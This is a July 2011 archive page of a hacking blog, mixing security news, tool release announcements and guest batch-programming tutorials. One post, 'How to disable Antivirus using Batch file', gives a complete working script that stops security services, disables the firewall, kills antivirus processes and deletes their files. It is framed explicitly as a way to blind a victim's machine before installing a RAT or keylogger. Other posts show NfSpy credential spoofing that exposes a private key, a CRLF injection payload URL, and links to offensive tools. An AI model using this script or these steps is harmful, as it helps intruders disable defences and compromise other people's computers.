Home / Archives for July 2011

facebook bug bounty program offers $500 for bug reporting

Posted by Deepanker Verma Sunday, July 31, 2011 0 comments

facebook bug bounty program offers $500 for bug reporting

Facebook has taken a step to find bugs in its social networking website. It has announced a bug bounty program rewarding $500 for finding bugs in the facebook. facebook announced this by its page. facebook wrote, "To show our appreciation for our security researchers, we offer a monetary bounty for certain qualifying security bugs."
To qualify for a bounty, you must:

Adhere to our Responsible Disclosure Policy (... give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data and interruption or degradation of our service during your research ...)
Be the first person to responsibly disclose the bug
Report a bug that could compromise the integrity or privacy of Facebook user data, such as:

Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF/XSRF)
Remote Code Injection

Reside in a country not under any current U.S. Sanctions (e.g., North Korea, Libya, Cuba, etc.)

https://www.facebook.com/whitehat/bounty/

#RefRef- DDos tool developed by Anonymous

Posted by Deepanker Verma Saturday, July 30, 2011 0 comments

#RefRef- DDos tool developed by Anonymous

Amomymous are building a new Denial of service attack tool which is said to exploit SQL vulnerabilities to support the group's future campaigns. This is called #RefRef and developed in Javascript. This was very effective in a 17 minute attack from a single machine resulting in a 42-minute outage on Pastebin yesterday. This was confirmed by the Pastebin via twitter.
This tool will e released in September. The tool uses a simple GUI to operate. As it turns out, the attack is launched client side, and will send a separate script in the connection request made to the target server. This request is actually the exploit itself, and once the server renders the code, it will continue to render it until crashing. In essence, the stronger the server, the faster it crashes.

New Account hijacking vulnerability found in Skype

Posted by Deepanker Verma 0 comments

New Account hijacking vulnerability found in Skype

A critical Cross site scripting (XSS) has been found in Skype which leads to account hijacking. This vulnerability is found in the versions which have facebook integration. This integration alllows users to see the facebook activity and post status updates.
security researcher David Vieira-Kurz discovered that the status comment field does not properly sanitize input and executes JavaScript code. Any attacker can exploit this vulnerability to post a comment that executes rogue code which steals a visitor's Skype session cookie when they view it in the browser.
But the attacker should in friend list, this is the limitation of this attack

How to disable Antivirus using Batch file | Batch programming part 3

Posted by Deepanker Verma 3 comments

Again a nice guest post on batch programming tutorial by Sanjay

Hi Friends, Hope you all fine...
Today I am gonna post some of the batch programs, To read the past two batch programming tutorial just click below link.

When you attempt to hack someone's system by RAT, Keylogger or iStealer then you'll first need to FUD your server but its not that much easy to find a good & free working FUD crypter, So first disable your slave antivirus and firewall. So they can't find out your Trojan virus (Server). The below batch program helps you to disable all the running antivirus in the syste. Just save copy and paste it in notepad file and save it with .bat extension.

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

:) Hope you Like It. Just leave your comments below. In my next batch programming tutorial I'll provide more batch programs to you :)

NfSpy – ID-spoofing NFS Client

Posted by Deepanker Verma Friday, July 29, 2011 0 comments

NfSpy – ID-spoofing NFS Client

NfSpy is a library/program that uses the Filesystem in Userspace (FUSE) library to automate the falsification of NFS credentials when mounting an NFS share.

Vulnerability exploited
NFS before version 4 is reliant upon host trust relationships for authentication. The NFS server trusts any client machines to authenticate users and assign the same user IDs (UIDS) that the shared filesystem uses. This works in NIS, NIS+, and LDAP domains, for instance, but only if you know the client machine is not compromised, or faking its identity. This is because the only authentication in the NFS protocol is the passing of the UID and GID (group ID). There are a few things that can be done to enhance the security of NFS, but many of them are incomplete solutions, and even with all three listed here, it could still be possible to circumvent the security measures.

Using NfSpy

A list of options can be seen by running
nfspy --help

Example

There is an NFS server on 192.168.1.124.
$ showmount -e 192.168.1.124
Export list for 192.168.1.124:
/home (everyone)

Mount up the share. Using sudo lets you bind to a privileged port, and the allow_other option lets any user use the filesystem. The other new option here is "hide", which immediately "unmounts" the share on the server, but keeps the filehandle it got. This hides your presence from anyone using showmount -a

$ sudo nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt

Enjoy your newfound freedom!

$ cd /mnt
/mnt$ ls -l
drwx------ 74 8888 200 4096 2011-03-03 09:55 smithj
/mnt$ cd smithj
/mnt/smithj$ cat .ssh/id.rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,30AEB543E512CA19

To unmount, use fusermount:
$ sudo fusermount -u /mnt
Advanced exampleThere is an NFS server on 192.168.1.124. Portmap is blocked, so you can't get a list of shares, but you can sniff the network traffic.
$ sudo tshark -n -i eth0 -T fields -e nfs.fhandle
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0
01:00:04:00:01:00:22:00:e5:03:d8:9d:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:00:00:00:00:00:00:00:00:00:00:00:00
01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:00:00:00:00:00:00:00:00:00:00:00:00

^C3 packets captured

Now use the dirhandle and getroot mount options to avoid using the mount daemon, and use the nfsport option to avoid using the portmapper, traversing up the directory tree to the root of the export.

$ sudo nfspy -o rw,server=192.168.1.124:,nfsport=2049/udp,dirhandle=01:00:04:01:01:00:22:00:e5:03:d8:9d:07:00:22:00:15:83:74:d5:

Read More
https://github.com/bonsaiviking/NfSpy

Download Here
https://github.com/bonsaiviking/NfSpy/archives/master

Download Apache Log Extractor

Posted by Deepanker Verma Thursday, July 28, 2011 0 comments

Download Apache Log Extractor

Apache Log Extractor is a quick script to export URL information from Apache access logs. The thought behind this script was to provide a list of known URL’s on a remote server by analysing the logs. This list could then be used as the input for further testing tools (e.g Burp Suite – Intruder)

The script accepts an Apache access file as the input and creates an output file containing one URL per line. The list is unique and should only contain the URL without parameters (incomplete directory names are not extracted). It also takes these URLs and creates a wordlist output of all valid directoy names for use with brute-forcing ec.

Download Here:
https://sites.google.com/a/c22.cc/storage/poc_scripts/apache_log_extractor.py?attredirects=0&d=1

Why Use a Network Security Scanner?

Posted by Deepanker Verma Wednesday, July 27, 2011 0 comments

Why Use a Network Security Scanner?

Every IT administrator strives to use the best security measures available to protect and secure the corporate network. One essential security tool is the network security scanner, which not only helps to identify weaknesses and vulnerabilities in the network but great reduces the workload for administrators.

Many different factors can impact security in modern business networks, and no IT department should be complacent about the possible consequences of failing to consider all of them.

Good network security means a lot more than simply installing an antivirus product and occasionally deploying Windows updates. Security risks can come from so many other directions.

Security holes in third party software products, employees’ use of uncontrolled devices, and failure to comply with regulatory requirements, can all land companies in hot water – both legally and financially. Good network security scanners are designed to take all these risks into consideration and guide companies on how to address the risks arising from the use of technology.

So, what kind of features should network administrators look for in a fully integrated network security scanner solution?

Compatibility with, and awareness of, all the commonly used software products and operating systems is a very important factor, and the software should be able to work with these systems in both physical and virtualized environments, in recognition of the way many companies now construct their IT systems.

Patch management is a key concern. So many updates and patches are released to protect against newly discovered security vulnerabilities, that without a patch management solution it is nearly impossible to manually keep track of everything which needs to be applied across an infrastructure, both for individual software products as well as the operating systems. A good network security scanner should have the functionality to detect when important updates are missing, and to help IT staff respond quickly to update their systems.

Vulnerabilities do not only exist because security or software updates have not been installed. Incorrect software configurations can create dangerous holes in the network, and these are sometimes caused by employees adjusting settings on their machines without knowledge of the knock-on effects. Choosing a network security scanner with change management and software audit capabilities can alert technical teams when these changes are made, allowing them to be quickly rectified.

Asset inventory management is also essential. If a staff member has had a networked laptop offsite for a prolonged period and then rejoins it to the network, the IT team needs to be able to receive a notification, and should quickly ensure it is patched with recent updates so that it doesn’t become a potential easy target for malware attacks.

Finally, a network security scanner can help the technical department with an increasingly burdensome duty – compliance. It is best to look for a product that when deployed on a network fulfills most if not all of the requirements of a particular regulatory framework, for example, the PCI DSS standard for organizations that work with credit card details.

A network security scanner is an essential addition to the modern IT department’s arsenal of security measures. The only alternative is to spend vast quantities of time performing manual tasks related to security and compliance, and still not achieve the levels of consistency possible with a dedicated solution managing these issues.

This guest post was provided by Ben Taylor on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. More information: GFI network security scanner

All product and company names herein may be trademarks of their respective owners.

Batch programming Tutorials Part 2

Posted by Deepanker Verma Monday, July 25, 2011 0 comments

This is a guest post written by Sanjay Jith who is the tech blogger at GeekFloor

Batch Files are very powerful programs that can cause unwanted result. There are many malicious combinations that can harm your computer. They can range from erasing windows to disabling keyboard via registry etc. Most famous malicious batch program is "Fork Bomb". It opens a program repeatedly so your memory filled and eventually your computer get crashes.
Create your own batch file,

1. Open Notepad.exe by either going to Run and typing "Notepad" without quotes or click Start > All Programs > Accessories > Notepad.

2. Copy and Paste the following code into Notepad:

@echo off
Echo Hello World!
pause

Note: After you paste this code in your notepad just click file > save as and save anything.bat, And choose save type as: All files.

Then click save. Then click on your batch file.

"Its not an malicious program, What it do is it will open a cmd prompt and it display Hello world! in it. Like in the pic below.

To stop any batch prog, Go to your task manager and click process and search for your file and click end process.

In my next tutorial I'll explain you about malicious batch program with example. Use all tricks only for educational purpose. Don't do any illegal activities, Then it'll cause unwanted result for you.

VirtualBox 4.1 Final released for Linux

Posted by Deepanker Verma 0 comments

VirtualBox 4.1 Final released for Linux

VirtualBox 4.1 final is released for Linux. It is a general-purpose full virtualizer for x86 hardware, targeted at server, desktop and embedded use. VirtualBox is a cross-platform virtualization application. What does that mean? For one thing, it installs on your existing Intel or AMD-based computers, whether they are running Windows, Mac, Linux or Solaris operating systems. Secondly, it extends the capabilities of your existing computer so that it can run multiple operating systems (inside multiple virtual machines) at the same time. So, for example, you can run Windows and Linux on your Mac, run Windows Server 2008 on your Linux server, run Linux on your Windows PC, and so on, all alongside your existing applications. You can install and run as many virtual machines as you like -- the only practical limits are disk space and memory.

VirtualBox is deceptively simple yet also very powerful. It can run everywhere from small embedded systems or desktop class machines all the way up to datacenter deployments and even Cloud environments.

This version is a major update. The following major new features were added:

Support for cloning of VMs (bug #5853, see the manual for more information): full clones can be created through the GUI and VBoxManage, linked clones only through VBoxManage
GUI: enhanced wizard for creating new virtual disks
GUI: new wizard for copying virtual disks
GUI: keep the aspect ratio in scale mode (Windows and OSX hosts only; bug #7822)
VMM: raised the memory limit for 64-bit hosts to 1TB
Experimental support for PCI passthrough for Linux hosts, see the manual for more information
Windows guests: Experimental WDDM graphics driver, supporting Windows Aero (bug #4607) and providing Direct3D support using a cleaner approach (no need to install the guest drivers in Safe Mode anymore)
Guest Additions: status of modules and features can now be queried separately by the frontends
Networking: new network attachment mode "Generic Driver", which offers an open plugin architecture for arbitrary and separately distributable virtual network implementations
Host-only Networking: fixed host crash in kernels prior to 2.6.29
New Networking Mode UDP Tunnel: allows to interconnect VMs running on different hosts easily and transparently, see the manual for more information
Experimental support for SATA hard disk hotplugging available with VBoxManage
Solaris hosts: New Crossbow based bridged networking driver for Solaris 11 build 159 and above

downlaod here:
http://www.virtualbox.org/wiki/Downloads

Hackers can blow up your MacBook

Posted by Deepanker Verma Sunday, July 24, 2011 0 comments

Hackers can blow up your MacBook

A security researcher has discovered a bug in the Mac Book. Security expert Charlie Miller, explained that the microcontroller that monitors the power level of Apple laptops can be compromised to run a malicious code on it. The researcher has found that the batteries’ microcontroller chips ship with default passwords. Once a hacker learns that password, they can learn to control the chips’ firmware and potentially hijack them. A hacker can well cause the laptop’s battery to explode.
“These batteries just aren’t designed with the idea that people will mess with them,” Miller said. “What I’m showing is that it’s possible to use them to do something really bad.”
“You could put a whole hard drive in, reinstall the software, flash the BIOS, and every time it would reattack and screw you over. There would be no way to eradicate or detect it other than removing the battery.” said Miller.
Miller plans to publicly disclose the flaw, and provide a fix at the Black Hat security conference in August.

Batch programming Tutorials Part 1

Posted by Deepanker Verma 1 comments

This is a guest post written by Sanjay Jith who is the tech blogger at GeekFloor

Today I am gonna explain you about the Batch Programming.

Batch Files:

Batch files came into notice when Microsoft Windows was introduced in 1985 and had a GUI OS/Interface. Before then, batch files were widely used to run earlier operating systems but were never recognized. Batch files back then could be executed by the Command Line Interpreter (CLI) COMMAND.COM. All operating systems before that had a text-based operating system and were designed to run on MS-DOS. Batch files significantly helped Windows operating systems. A batch file named AUTOEXEC.BAT was responsible for the automatic loading of Windows on the early versions of these operating systems.

Windows batch files were used crucially in these operating systems mainly:

Windows 1
Windows 2
Windows 3
Windows 95
Windows 98
Windows ME

Batch files are still used as crucial bits in Windows but not as much. Yes, all this does sound confusing. But all you need to know is that batch files originated in early versions of Windows and performed many crucial tasks on these early operating systems.

What can batch scripts be used for?

It can be used for various tasks regarding the Windows operating systems. For example, it can be used to delete files, change attributes, remove directories, edit the registry, modify services, and many other things. It is very simple to learn and it can be very beneficial for anyone to know that uses Windows.

Creating Batch files:

Well batch files can be created by using simple text editors (such as notepad). All you need to do is save your file as one of these extensions:

.bat

This is the first ever extension made for batch files. This extension is compatible with all versions of windows.

.cmd

This extension is mainly used by operating systems in Windows NT family.

.btm

This is the extension that is used by 4DOS and 4NT. It was previously used for faster compilation sequences.

Can I make viruses with batch?

Viruses are very complex and are coded in things like C++ and Assembly. Viruses are self-replicating malware that is created for the sole purpose of damage and theft of information. Things coded in batch that are claimed to be malware normally are scripts that are added to start-up and The answer is no. Anyone claiming to doesn't fully understand a virus.

perform reboot loops, flooding hard drive so it will run out of space, performing a loop that opens

command lines causing the computer to freeze, and things of that sort.

Batch Commands:

Open up Command Prompt and type "help" without quotes, then hit enter. It will show a list of commands and a description of each.To get more information about a command or to get its usage instructions, then type the command with "/?" without quotes at the end.I have provided a list of the commands and their description. I have also added a few more commands that aren't listed. I created this list a while back. For example, "reg /?" without quotes.

Assoc - Displays or modifies file extension associations.

Attrib - Displays or changes file attributes.

Bootcfg - Used to configure, query, change or delete the boot entry settings in the boot.ini file.

Break - Sets or clears extended CTRL+C checking.

Bcdedit - Sets properties in boot database to control boot loading.

Cacls - Displays or modifies access control lists (ACLs) of files.

Call - Call one batch program from another

CD - Change Directory - Changes the directory it reads from or displays the name of the current directory.

Chkdsk - Checks a disk and displays statusreport.

Chkntfs - Check the NTFS file system

Choice - Allows uses to select one item from a list of choices and returns the index of the selected choice.

Cipher - Displays or alters the encryption of directories on NTFS paritions.

CleanMgr- Automated cleanup of Temp files, recycle bins, etc.

Cls - Clears the screen.

Cmd - Starts a new instance of the Windows command interpreter.

Cmdkey - Creates, displays, and deletes stored user names and passwords.

Color - Sets the default console foreground and backgroup colors.

Comp - Compares the contents of two files or sets of files.

Compact - Displays or alters the compression of files on NTFS partitions.

Convert - Converts FAT volumes to NTFS.

Copy - Copies one or more files to another location.

Date - Displays or sets the date.

Defrag - Defragments the hard drive.

Del - Deletes one or more files.

Dir - Displays a list of files and folders.

Diskcomp - Compare the contents of one floppy disk to another.

Diskpart - Displays or configures disk partition properties.

Doskey - Edits command lines, recalls Windows commands, and creates macros.

Driverquery - Displays current device driver status and properties.

Echo - Displays messages, or turns command echoing on or off.

Endlocal - End localisation of environment changes in a batch files.

Erase - Deletes one or more files.

Eventcreate - Add a message to the Windows event log.

Exit - Exits Command Prompt.

Expand- Expands one or more compressed files.

FC - Compares two files.

Find - Searches for a text string in a file or files.

Findstr - searches for strings in files.

For - Runs a specified command for each file in a set of files.

Forfiles - Selects a file, or set of files, and executes a command on that file.

Format - Formats a disk for use with Windows.

Fsutil - Displays or configures the file system properties.

Ftp - Transfers files to and from a romcputer running an FTP server service.

Ftype - Displays or modifies file types used in file extension associations.

Goto - Directs the Windows command interpreter to a labeled line in a batch program.

Gpupdate - Updates group policies settings.

Graftabl - Enables Windows to display an extended character set in graphics mode.

Help - Provides help information for Windows commands.

Icacls - Display, modify, backup, or restore ACLs for files and directories.

If - Performs conditional processing in batch programs.

Ipconfig - IP configuration.

Label - Creates, changes, or deletes the volume label of a disk.

MD - Creates a directory.

MKDir - Creates a directory

Mklink - Creates a symbolic link.

Mode - Configures a system device.

More - Displays output one screen at a time.

Mountvol - Creates, deletes, or lists a volume mount point.

Move - Moves one or more files from one directory to another directory.

Msg - Send a message to a user.

Msiexec - Microsoft Windows Installer.

Mstsc - Remote Desktop

Net - Manage network resources

Netsh - Configure network interfaces.

Nbtstat - Displays protocol statistics and current TCP/IP connections using NBT.

Netstat - Displays protocol statistics and current TCP/IP network connections.

Nslookup - Name server lookup

Openfiles - Displays files opened by remote users for a file share.

Path - Displays or sets a search path for executable files.

Pathping - Trace route plus network latency and packet loss.

Pause - Suspends processing of a batch file and displays a message.

Perfmon - Performance monitor

Ping - Test a network connection

Popd - Restores the previous value of the current directory saved by PUSHD.

Powercfg - Configures power settings.

Print - Prints a text file.

Prompt- Changes the Windows command prompt.

Pushd - Saves the current directory then changes it.

Rasdial - Manage RAS connections

Rasphone - Manage RAS connections

RD - Removes a directory (folder).

Recover - Recovers readable information from a bad or defective disk.

Reg - Registry: Read, set, export, delete, and add keys and values.

Regedit - Import or export registry settings.

Regsvr32 - Register or unregister a DLL.

Regini - Change Registry permissions.

REM - Records comments in batch files.

REN - Renames a file or files.

Rename - Renames a file or files.

Replace - Replaces files.

RMDIR - Removes a directory (folder).

Robocopy - Advanced utility to copy files and directory trees.

Route - Manipulate network routing tables.

RunAs - Executes a program uder a different user account.

Rundll32 - Runs a DLL command.

SC - Displays or configures services.

Schtasks - Schedules a command to run at a specific time.

Set - Displays, sets, or removes Windows environment variables.

Setlocal - Begins localization of environment changes in a batch file.

Setx - Set environment variables permanently.

SFC - System File Checker

Shift - Shifts the position of replaceable parameters in batch files.

Shutdown - Allows proper local or remote shutdown of machine.

Slmgr - Software Licensing Management

Sort - Sorts input.

Start - Starts a separate window to run a specified program or command.

Subst - Associates a path with a drive letter.

Systeminfo - Displays machine specific properties and configuration.

TaskList - Displays all currently running tasks including services.

Taskkill - Kill or stop a running process or application.

Time - Displays or sets the system time.

Timeout - Delay processing of a batch file.

Title - Sets the window title for a batch file.

Tracert - Trace route to a remote host.

Tree - Graphically displays the directory structure of a drive or path.

Type - Displays the contents of a text file.

Typeperf - Write performance data to a log file.

Ver - Displays the Windows version.

Verify - Tells Windows whether to verify that your files are written correctly to a disk.

Vol - Display a disk volume label and serial number.

Where - Locate and display files in a directory tree.

Whoami - Output the current Username and domain.

WMIC - WMI commands.

Wuauclt - Windows Update

Color Codes:

These are used to change the color of the GUI. Not required, but they make the Black and White command prompt look better.

I prefer light yellow text on a light red background.

0 = Black

1 = Blue

2 = Green

3 = Aqua

4 = Red

5 = Purple

6 = Yellow

7 = White

8 = Gray

9 = Light Blue

A = Light Green

B = Light Aqua

C = Light Red

D = Light Purple

E = Light Yellow

F = Bright White

To view the list of colors in your cmd prompt,

1)Open your cmd prompt and just type "help color"(without the quotes),

2)Help with a list of the colors available will show up,

3)The list will show numbers from 0 to 9 and letters from A to F.

Type 'color 6' to have yellow text, 'color 4' to have red text, 'color A' to have light green text etc. ( Ignore all quotes )

To change the color of the text as well as the background, type 'color ce' ( without the quotes )

to have light yellow text on a light red background or any other combination.

The first letter/number is the color of the background and the second is the color of the text.

to be continued in next posts...

If you have any questions.. :)

Hackers boldly claimed, FBI and others can't stop them

Posted by Deepanker Verma Friday, July 22, 2011 0 comments

Hackers boldly claimed, FBI and others can't stop them

Lulzsec and Anonymous have published a letter in which they addressed to FBI and others that they can't stop them.
they wrote,"We want to send a message that chaos on the Internet is unacceptable, [even if] hackers can be believed to have social causes, it's entirely unacceptable to break into websites and commit unlawful acts," Chabinsky told the National Public Radio (NPR)."
They published this letter after the claim of FBI that they caught members of hacker groups. Hackers adviced FBI not to lie to world.
"These governments and corporations are our enemy. And we will continue to fight them, with all methods we have at our disposal, and that certainly includes breaking into their websites and exposing their lies," the hackers added.
Read the full published letter
http://pastebin.com/RA15ix7S

NetSecL v.3.2 Released

Posted by Deepanker Verma 0 comments

NetSecL v.3.2 Released

NetSecL is a hardened,live and installable OS based on OpenSuse suitable for Desktop/Server and Penetration testing. Once installed you can fully enjoy the features of GrSecurity hardened kernel and penetration tools OR use the penetration tools directly from your live DVD.

NetSecL 3.2 comes with a brand new XFCE which increased dramatically the performance experience, we closed many bugs and also gained more compatibility to OpenSuse 11.4 – most packages are 11.4 compatible.GrSecurity kernel is updated to 2.6.32.8

Download Here:
http://www.netsecl.com/download

winAUTOPWN v2.7 - Released

Posted by Deepanker Verma 0 comments

winAUTOPWN v2.7 - Released

This version covers almost all remote exploits up-till mid-July 2011 and a few older ones as well.This version incorporates a few new commandline parameters: -perlrevshURL (for a PERL Reverse Shell URL), -
mailFROM (smtpsender) and -mailTO (smtpreceiver).These are the commandline arguments required for a few exploits which require remote connect-back using a perl shell and email server exploits requiring authentication respectively.This version also tackles various internal bugs and fixes them.

Download Here:
http://marijuanaunion.net/quaker/v2/w/Downloads.html

DNS Cache Poisoning Used in Brazilian Phishing Attack

Posted by Deepanker Verma Tuesday, July 19, 2011 0 comments

DNS Cache Poisoning Used in Brazilian Phishing Attack

Zscaler Security researchers have found a phishing attack that used DNS cache poisoning to direct victims to a spoofed banking website. The unusual attack was detected to target customers of Banco Santander Brasil, in Brazil. Attackers managed to force several DNS servers to resolve santander.com.br to an IP address under their control. The spoofed page hosted on the rogue web server was very well crafted and looked identical to the real one.
"In such a situation, phishers do not need to blast e-mails to random Brazilian e-mail accounts. They just need to wait for the Santander customers to login into their bank account, when accessing the site via the poisoned DNS servers," Zscaler's Julien Sobrier explains.
This type of phishing attack is very hard to detect and block. Victims have no indication that they are on a different website
Fortunately, the affected DNS servers have been cleaned up and are now functional properly. The number of potentially affected users is not known.

Source: Softpedia News

CRLF injection attack and HTTP response splitting

Posted by Deepanker Verma 0 comments

CRLF injection also known as HTTP response spliting is a simple web attack but very powerful. Hackers actively exploit this web application vulnerability to perform a large variety of some serious attacks. This was also founded in Google Adwords some years ago.
The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. These two represent the END OF LINE for various internet protocols. When programmers write code for web applications they split headers based on where the CRLF is found. If a malicious user is able to inject his own CRLF sequence into an HTTP stream, he is able to maliciously control the way a web application functions.

Example:

suppose you got a link from a malicious user

http://www.yoursite.com/page.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3Ethis is the Hacker's Content%3C/html%3E

You will get a page saying
this is the Hacker's Content

But this page is generated by the server in which hacker has injected HTML code. More sophisticated variations of this example can lead to poisoning of the client's web-cache, cookies, XSS, temporary or permanent defacement of web pages and even information theft.

Preventing CRLF

The best protection is filtering user input
properly sanitize URLs that point to web pages on your site containing any server re-direction code.

Mantra Security Toolkit 0.6.1 Released – Browser Based Hacking Framework

Posted by Deepanker Verma Monday, July 18, 2011 0 comments

Mantra Security Toolkit 0.6.1 Released – Browser Based Hacking Framework

Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

The software is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks.

Download Here:
http://getmantra.com/download/index.html

PuTTY V.0.61 released

Posted by Deepanker Verma 0 comments

PuTTY V.0.61 released

PuTTY 0.61 is out, after over four years , with new features, bug fixes, and compatibility updates for Windows 7 and various SSH server software.

PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator

LEGAL WARNING: Use of PuTTY, PSCP, PSFTP and Plink is illegal in countries where encryption is outlawed. I believe it is legal to use PuTTY, PSCP, PSFTP and Plink in England and Wales and in many other countries, but I am not a lawyer and so if in doubt you should seek legal advice before downloading it. You may find this site useful (it's a survey of cryptography laws in many countries) but I can't vouch for its correctness.

These features are new in beta 0.61:
Kerberos/GSSAPI authentication in SSH-2.
Local X11 authorisation support on Windows. (Unix already had it, of course.)
Support for non-fixed-width fonts on Windows.
GTK 2 support on Unix.
Specifying the logical host name independently of the physical network address to connect to.
Crypto and flow control optimisations.
Support for the zlib@openssh.com SSH-2 compression method.
Support for new Windows 7 UI features: Aero resizing and jump lists.
Support for OpenSSH AES-encrypted private key files in PuTTYgen.
Bug fix: handles OpenSSH private keys with primes in either order.
Bug fix: corruption of port forwarding is fixed (we think).
Bug fix: various crashes and hangs when exiting on failure,
Bug fix: hang in the serial back end on Windows.
Bug fix: Windows clipboard is now read asynchronously, in case of deadlock due to the clipboard owner being at the far end of the same PuTTY's network connection (either via X forwarding or via tunnelled rdesktop).

Download
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

download WPScan | WordPress Security Scanner

Posted by Deepanker Verma Saturday, July 16, 2011 0 comments

download WPScan | WordPress Security Scanner

Introduction
WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach.

Details
Username enumeration (from author querystring and location header)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (2220 most popular by default)
Plugin vulnerability enumeration (based on version) (todo)
Plugin enumeration list generation
Other misc WordPress checks (theme name, dir listing, ...)

Download Here:
http://code.google.com/p/wpscan/downloads/list

How to Hack Twitter Account

Posted by Deepanker Verma Monday, July 11, 2011 2 comments

How to hack twitter account

Many of readers sent me emails for writing a post on twitter account hacking. Before writing more on topic i want to say one thing that there is no any software tool which can give you passwords of any twitter account by entering the user name. If you are here for any this type of software then please leave this website.

sslsniff v0.7 – SSL Man-In-The-Middle (MITM) Tool

Posted by Deepanker Verma Sunday, July 10, 2011 0 comments

sslsniff v0.7 – SSL Man-In-The-Middle (MITM) Tool

This tool was originally written to demonstrate and exploit IE’s vulnerability to a specific “basicConstraints” man-in-the-middle attack. While Microsoft has since fixed the vulnerability that allowed leaf certificates to act as signing certificates, this tool is still occasionally useful for other purposes.
It is designed to MITM all SSL connections on a LAN and dynamically generates certs for the domains that are being accessed on the fly. The new certificates are constructed in a certificate chain that is signed by any certificate that you provide.

The three steps to get this running are:

Download and run sslsniff-0.7.tar.gz
Setup iptables
Run arp-spoof

Download Here:
http://www.thoughtcrime.org/software/sslsniff/sslsniff-0.7.tar.gz

Hacking Tricks

facebook bug bounty program offers $500 for bug reporting

#RefRef- DDos tool developed by Anonymous

New Account hijacking vulnerability found in Skype

How to disable Antivirus using Batch file | Batch programming part 3

NfSpy – ID-spoofing NFS Client

Download Apache Log Extractor

Why Use a Network Security Scanner?

Batch programming Tutorials Part 2

